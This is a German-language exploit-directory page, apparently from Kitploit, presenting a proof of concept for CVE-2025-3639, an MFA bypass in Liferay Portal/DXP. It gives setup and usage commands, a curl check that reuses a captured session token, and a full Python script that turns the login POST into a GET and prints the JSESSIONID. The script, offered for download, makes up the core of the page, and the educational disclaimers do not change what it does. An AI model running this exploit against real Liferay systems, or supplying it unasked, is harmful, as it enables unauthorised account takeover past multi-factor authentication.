Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-3639 — Schwachstelle zur Umgehung der Anmeldung in Liferay Portal (Versionen 7.3.0–7.4.3.132) und Liferay DXP (verschiedene Versionen von 2024.Q1 bis 2025.Q1.6) | Kitploit
Tools/GitHubGitHub/6lj/cve-2025-3639
Authentifizierung & AutorisierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHub6lj/cve-2025-3639

CVE-2025-3639

Schwachstelle zur Umgehung der Anmeldung in Liferay Portal (Versionen 7.3.0–7.4.3.132) und Liferay DXP (verschiedene Versionen von 2024.Q1 bis 2025.Q1.6)

Repository anzeigen
2vor 11 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-3639 PoC - Liferay Portal/DXP Anmeldeumgehung

Dieses Repository enthält einen Proof of Concept (PoC) für CVE-2025-3639, eine Schwachstelle zur Anmeldeumgehung in Liferay Portal (Versionen 7.3.0–7.4.3.132) und Liferay DXP (verschiedene Versionen von 2024.Q1 bis 2025.Q1.6). Der PoC zeigt, wie ein nicht authentifizierter Benutzer mit gültigen Anmeldedaten die Multi-Faktor-Authentifizierung (MFA) umgehen kann, indem er eine POST-Anfrage in eine GET-Anfrage ändert, was potenziell unbefugten Zugriff auf Benutzerkonten ermöglicht.

Warnung: Dieser PoC dient nur zu Bildungszwecken. Unbefugtes Testen oder Ausnutzen dieser Schwachstelle ist illegal und unethisch. Verwenden Sie ihn nur mit ausdrücklicher schriftlicher Genehmigung des Systembesitzers.

Anforderungen

  • Umgebung: Linux (z. B. Kali Linux, Ubuntu oder eine virtualisierte Umgebung).
  • Abhängigkeiten:
    root@kitploit:~
    sudo apt-get update
    sudo apt-get install python3 python3-requests
    pip3 install requests
    
  • Netzwerk: Zugriff auf eine Zielinstanz von Liferay Portal/DXP (muss in einer Testumgebung mit ausdrücklicher Genehmigung sein).
  • Anmeldedaten: Gültige Benutzeranmeldedaten für die Ziel-Liferay-Instanz.

Installation

  1. Klonen Sie das Repository:

    root@kitploit:~
    git clone https://github.com/6lj/CVE-2025-3639.git
    cd CVE-2025-3639
    
  2. Stellen Sie sicher, dass Python 3 und die requests-Bibliothek installiert sind:

    root@kitploit:~
    pip3 install requests
    

Was es tut

  • Der PoC nutzt CVE-2025-3639 aus, indem er eine POST-Anmeldeanfrage in eine GET-Anfrage ändert und so MFA-Prüfungen umgeht.
  • Er sendet eine manipulierte HTTP-GET-Anfrage mit gültigen Anmeldedaten, um sich zu authentifizieren, ohne den MFA-Prozess abzuschließen.
  • Das Skript ist darauf ausgelegt, die Schwachstelle in einer kontrollierten, autorisierten Umgebung zu demonstrieren.

Verwendung

Führen Sie das PoC-Skript mit den entsprechenden Argumenten aus (ersetzen Sie <target_url>, <username> und <password> durch die URL der Ziel-Liferay-Instanz und gültige Anmeldedaten).

poc.py

root@kitploit:~
python3 poc.py --target <target_url> --username <username> --password <password>
  • Parameter:
    • --target: Die URL der Liferay Portal/DXP-Instanz (z. B. http://example.com).
    • --username: Gültiger Benutzername für die Zielinstanz.
    • --password: Gültiges Passwort für den Benutzernamen.

Beispiel

root@kitploit:~
python3 poc.py --target http://192.168.1.100 --username [email protected] --password Test123!

Ergebnisse überprüfen

  • Erfolg: Wenn der Exploit funktioniert, gibt das Skript ein gültiges Sitzungstoken oder eine Erfolgsmeldung zurück, die den Zugriff auf das Benutzerkonto ohne MFA anzeigt.

    root@kitploit:~
    curl -b "COOKIE=<session_token>" http://<target_url>/api/jsonws/user/get-current-user
    
    • Erwartete Ausgabe: Benutzerdetails, die eine erfolgreiche Authentifizierung bestätigen.
  • Fehler: Wenn der Server einen Fehler zurückgibt (z. B. 401 Unauthorized oder 403 Forbidden), ist die Instanz möglicherweise nicht anfällig oder MFA ist nicht aktiviert.

  • Verkehr überwachen: Verwenden Sie ein Tool wie Wireshark, um den HTTP-Verkehr zu überwachen:

    root@kitploit:~
    sudo wireshark -f "tcp port 80 or tcp port 443"
    

PoC-Skript

Unten befindet sich der Beispielcode für poc.py:

root@kitploit:~
import requests
import argparse

def exploit(target, username, password):
    print(f"[*] Attempting CVE-2025-3639 exploit on {target}")
    login_url = f"{target}/c/portal/login"

    params = {
        "p_auth": "",
        "login": username,
        "password": password
    }
    
    try:
        response = requests.get(login_url, params=params, allow_redirects=True)
        if response.status_code == 200 and "JSESSIONID" in response.cookies:
            print(f"[+] Success! Session token: {response.cookies['JSESSIONID']}")
            return True
        else:
            print(f"[-] Failed: {response.status_code} - {response.text}")
            return False
    except Exception as e:
        print(f"[-] Error: {str(e)}")
        return False

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="CVE-2025-3639 PoC for Liferay Portal/DXP")
    parser.add_argument("--target", required=True, help="Target Liferay URL (e.g., http://example.com)")
    parser.add_argument("--username", required=True, help="Valid username")
    parser.add_argument("--password", required=True, help="Valid password")
    args = parser.parse_args()
    
    exploit(args.target, args.username, args.password)

Wichtige Hinweise

  • Dieser PoC erfordert gültige Anmeldedaten, da die Schwachstelle das Umgehen von MFA, aber nicht das Erraten von Anmeldedaten ermöglicht.
  • Testen Sie nur in einer kontrollierten Umgebung mit ausdrücklicher Genehmigung des Systembesitzers.
  • Die Schwachstelle wurde in neueren Versionen von Liferay Portal/DXP behoben. Aktualisieren Sie auf die neueste Version, um dieses Problem zu beheben.
  • Liferay Security Advisory
  • NVD CVE-2025-3639
  • GitHub Repository

Haftungsausschluss

Dieses Projekt dient nur zu Bildungszwecken. Der Autor ist nicht verantwortlich für eine unbefugte oder illegale Nutzung dieses PoC. Holen Sie vor dem Testen immer die ausdrückliche Genehmigung des Systembesitzers ein.

Tool herunterladen